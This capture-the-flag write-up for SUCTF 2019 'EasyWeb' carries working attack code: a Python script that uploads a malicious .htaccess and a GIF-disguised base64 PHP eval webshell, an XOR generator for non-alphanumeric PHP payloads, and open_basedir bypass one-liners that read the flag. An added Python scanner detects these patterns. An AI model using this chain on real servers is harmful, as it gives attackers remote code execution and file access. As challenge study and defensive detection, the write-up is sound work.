[SUCTF 2019]EasyWeb
2022-06-09 02:02:00 【I·CE】
Knowledge points:
AddType application/x-httpd-php .ahhh: adding this directive through an uploaded .htaccess makes files with the .ahhh extension be parsed as PHP scripts
GIF89a file header spoofing
GIF89a12: the "12" pads the 6-byte GIF89a header to 8 bytes (a multiple of 4) so the file satisfies base64 decoding rules
Bypassing open_basedir
Non-alphanumeric webshell
Python upload script:
import requests
import base64

# .htaccess payload: the #define lines let the file pass the image check,
# AddType makes .ahhh files run as PHP, and auto_append_file base64-decodes
# shell.ahhh on every request. Each directive must sit on its own line.
htaccess = b"""#define width 1337
#define height 1337
AddType application/x-httpd-php .ahhh
php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh"
"""

# GIF89a header padded to 8 bytes so the base64 filter decodes the rest cleanly
shell = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")

url = "http://1c512d61-43b5-41ae-9f74-4228d9af8caf.node4.buuoj.cn:81/?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"
data = {"upload": "Submit"}

# upload the .htaccess first
files = {'file': ('.htaccess', htaccess, 'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)

# then upload the shell
files = {'file': ('shell.ahhh', shell, 'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)
XOR script:
<?php
// For each character of $string, look for two bytes from $a whose XOR equals it
// and print the pair as a URL-encoded expression (e.g. %86^%d9)
function finds($string)
{
    $index = 0;
    $a = [33, 35, 36, 37, 40, 41, 42, 43, 45, 47, 58, 59, 60, 62, 63, 64, 92, 93, 94, 123, 125, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255];
    for ($i = 27; $i < count($a); $i++) {
        for ($j = 27; $j < count($a); $j++) {
            $x = $a[$i] ^ $a[$j];
            for ($k = 0; $k < strlen($string); $k++) {
                if (ord($string[$k]) == $x) {
                    echo $string[$k];
                    echo '<br/>';
                    echo '%' . dechex($a[$i]) . '^%' . dechex($a[$j]);
                    echo '<br/>';
                    $index++;
                    if ($index == strlen($string)) {
                        return 0;
                    }
                }
            }
        }
    }
}
finds("phpinfo");
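As a defensive counterpart to the two techniques above (the .htaccess/GIF polyglot upload and the XOR-built variable-variable in the query string), here is a small Python scanner added to this page; it is not code from the write-up. It flags an uploaded server-config filename, Apache handler or php_value directives inside an "image", an image header followed by base64 that decodes to PHP (decoded as one run, the same way the convert.base64-decode filter consumes it, which is why the header has to be padded to a multiple of 4), and the `${...^...}` construction with high bytes in a query string. The sample inputs are constructed from the payloads shown above; the finding labels, the 16-character base64 run threshold and the blocked-filename set are my own choices.

```python
import base64
import binascii
import re
from typing import List
from urllib.parse import unquote_to_bytes

# Constructed samples modelled on the write-up's payloads (not captured traffic)
SAMPLE_HTACCESS = (b"#define width 1337\n#define height 1337\n"
                   b"AddType application/x-httpd-php .ahhh\n"
                   b'php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh"\n')
SAMPLE_SHELL = b"GIF89a12" + base64.b64encode(b"<?php eval($_REQUEST['cmd']);?>")
SAMPLE_BENIGN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00,"
                     b"\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
SAMPLE_QUERY = "_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"
SAMPLE_BENIGN_QUERY = "page=2&q=caf%C3%A9"

# Filenames that reconfigure the web server or PHP if they land in a served directory
BLOCKED_NAMES = {".htaccess", ".user.ini"}
# Apache directives that change how uploaded files are interpreted
DIRECTIVE_RE = re.compile(
    rb"^\s*(AddType|AddHandler|SetHandler|php_value|php_flag|php_admin_value)\b", re.I | re.M)
# PHP open tags, looked for both in raw content and in decoded base64
PHP_TAG_RE = re.compile(rb"<\?(php\b|=)", re.I)
# A long run of base64 alphabet characters, as the decode filter would consume it
B64_RUN_RE = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
# PHP's ${ ... ^ ... } variable-variable built from an XOR of two strings
XOR_VAR_RE = re.compile(rb"\$\{[^}]*\^[^}]*\}")


def scan_upload(filename: str, content: bytes) -> List[str]:
    """Return finding labels for an uploaded file; an empty list means nothing suspicious."""
    findings = []
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base.lower() in BLOCKED_NAMES or base.startswith("."):
        findings.append("server-config-filename")
    if DIRECTIVE_RE.search(content):
        findings.append("apache-php-directive")
    if PHP_TAG_RE.search(content):
        findings.append("php-open-tag")
    # Polyglot check: decode each base64 run as a whole. The image magic is part of
    # the run, so a header padded to a multiple of 4 decodes to junk followed by PHP.
    for m in B64_RUN_RE.finditer(content):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        if PHP_TAG_RE.search(decoded):
            findings.append("base64-php-payload")
            break
    return findings


def scan_query(raw_query: str) -> List[str]:
    """Return finding labels for a URL query string (percent-decoded before matching)."""
    findings = []
    decoded = unquote_to_bytes(raw_query)
    m = XOR_VAR_RE.search(decoded)
    if m:
        findings.append("xor-variable-variable")
        # Operands above 0x7f are the hallmark of the non-alphanumeric construction
        if any(b >= 0x80 for b in m.group(0)):
            findings.append("high-byte-xor-operands")
    return findings


if __name__ == "__main__":
    for name, data in [(".htaccess", SAMPLE_HTACCESS), ("shell.ahhh", SAMPLE_SHELL),
                       ("cat.gif", SAMPLE_BENIGN_GIF)]:
        print(name, scan_upload(name, data))
    for q in (SAMPLE_QUERY, SAMPLE_BENIGN_QUERY):
        print(q, scan_query(q))
```

The upload check is meant to run before the file is written into a served directory; rejecting dotfiles outright and refusing any content that carries server directives removes the first stage of the chain regardless of what the image check accepts. The query check is a log or WAF rule rather than a blocker, since `${...}` with high bytes has no legitimate use in ordinary form parameters but the pattern should still be reviewed rather than silently dropped.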
Bypassing open_basedir (three stages: set the new directory, list /, then read the flag):
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir("/"));
chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g'));